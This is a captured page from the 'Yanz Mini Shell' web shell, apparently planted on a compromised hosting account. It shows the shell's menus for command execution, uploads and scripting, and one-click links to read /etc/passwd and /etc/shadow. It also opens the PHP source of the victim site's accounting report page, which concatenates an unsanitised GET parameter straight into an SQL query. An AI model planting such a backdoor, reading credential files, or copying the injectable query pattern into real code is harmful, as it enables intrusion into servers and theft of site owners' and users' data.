Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
housgcjs
elaan.net
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php $path="admin/orna/"; require_once('admin/orna/db.php'); if(isset($_GET['acc_nm'])){ $where="where acc_nm='".$_GET['acc_nm']."'";} else{ $where=""; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content="Dashboard"> <meta name="keyword" content="Dashboard, Bootstrap, Admin, Template, Theme, Responsive, Fluid, Retina"> <title>Report Parameters</title> <script src="assets/js/now.js"></script> <!-- Bootstrap core CSS --> <link href="assets/css/bootstrap.css" rel="stylesheet"> <link href="assets/css/orna.css" rel="stylesheet"> <!--external css--> <link href="assets/font-awesome/css/font-awesome.css" rel="stylesheet" /> <!-- Custom styles for this template --> <link href="assets/css/style.css" rel="stylesheet"> <link href="assets/css/style-responsive.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> <style> .custom_check { background: #ffffff; padding: 7px 5px; margin-top: 17px; border-radius: 4px; border: 1px solid #ccc; } .check_custom_inner { width: max-content !important; margin: 0 !important; top: 50%; transform: translateY(-50%); margin-left: 10px !important; } .custom_check .checkbox-inline { font-weight: bold !important; } </style> </head> <body> <section id="container" > <!--header start--> <?php require_once('inc-core/header.inc')?> <!--header end--> <!--sidebar start--> <?php require_once('inc-core/side-bar.inc');?> <!--sidebar end--> <!--main content start--> <section id="main-content"> <section class="wrapper site-min-height"> <!--content-start--> <div id="title"> <div class="row"> <div class="col-sm-12"> <h1>Report Parameters</h1> <p>Please select date range</p> </div> </div> </div> <div id="form-wrapper"> <form class="form-inline" role="form" action="onscreen/trial-balance-3clm.php" method="GET"> <div class="row"> <div class="col-sm-3"> From: <input type="date" class="form-control" placeholder="From" name="from" required> </div> <div class="col-sm-3"> To: <input type="date" class="form-control" value="<?php echo date('Y-m-d'); ?>" name="till" required> </div> <div class="col-sm-2 custom_check"> <label class="checkbox-inline"> Show Virtual Invoices: <input type="checkbox" class="check_custom_inner" name="type"> </label> </div> <div class="col-sm-2 custom_check"> <label class="checkbox-inline"> Show Empty Accounts: <input type="checkbox" class="check_custom_inner" name="eval" checked> </label> </div> <div class="col-sm-2"> Accounts <!--Drop Down Button--> <div class="dropdown docs-options"> <button class="btn btn-default btn-block dropdown-toggle" id="toggleOptions" type="button" data-toggle="dropdown" aria-expanded="true"> Choose SubHead Account <span class="caret"></span> </button> <ul class="dropdown-menu" role="menu" aria-labelledby="toggleOptions"> <li role="presentation"> <label class="checkbox-inline"> <input type="checkbox" id="all" value="*" data-name="acc_nm" checked>All </label> </li> <?php $sql_v="select title, acc_nm_s,acc_nm_h from `".$MySQL_database."`.acc_sub order by acc_nm_h"; $v_query=mysqli_query($connection,$sql_v); while($vtype=mysqli_fetch_assoc($v_query)){ $s="select title from `".$MySQL_database."`.acc_head where acc_nm_h ='".$vtype['acc_nm_h']."'"; $hd=mysqli_fetch_assoc(mysqli_query($connection,$s)); print " <li role=\"presentation\"> <label class=\"checkbox-inline\"> <label class=\"checkbox-inline\"> <input type=\"checkbox\" class=\"checkbox\" value=\""; echo $vtype['acc_nm_s']; print"\" checked>"; echo $hd['title'].' --- '.$vtype['title']; print" </label> </li>"; } ?> </ul> <!--Important Input Field--> <input type="hidden" name="acc_nm" value="" id="acc_nm"> </div> <!--Drop Down Button--> </div> <div class="row"> </div> </div> <div id="footer"> <div class="row left"> <div class="col-sm-12 center"> <button type="submit" class="btn btn-theme" value="print" name="submit" >Print Report</button> <button type="submit" class="btn btn-success " id="excell" value="true" name="excel" >Export to Excel</button> <button type="clear" class="btn btn-default">Clear</button> </div> </div> </div> </form> <!--content-end--> </section><!--/wrapper --> </section><!-- /MAIN CONTENT --> <!--main content end--> <?php require_once('inc-core/footer.inc')?> </section> <!-- js placed at the end of the document so the pages load faster --> <script src="assets/js/jquery.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/jquery-ui-1.9.2.custom.min.js"></script> <script src="assets/js/jquery.ui.touch-punch.min.js"></script> <script class="include" type="text/javascript" src="assets/js/jquery.dcjqaccordion.2.7.js"></script> <script src="assets/js/jquery.scrollTo.min.js"></script> <script src="assets/js/jquery.nicescroll.js" type="text/javascript"></script> <!--common script for all pages--> <script src="assets/js/common-scripts.js" type="text/javascript"></script> <script src="admin/ajax/js/dropdown-checklist.js" type="text/javascript"></script> <!--script for this page--> </body> </html>
Free Space : 77942734848 Byte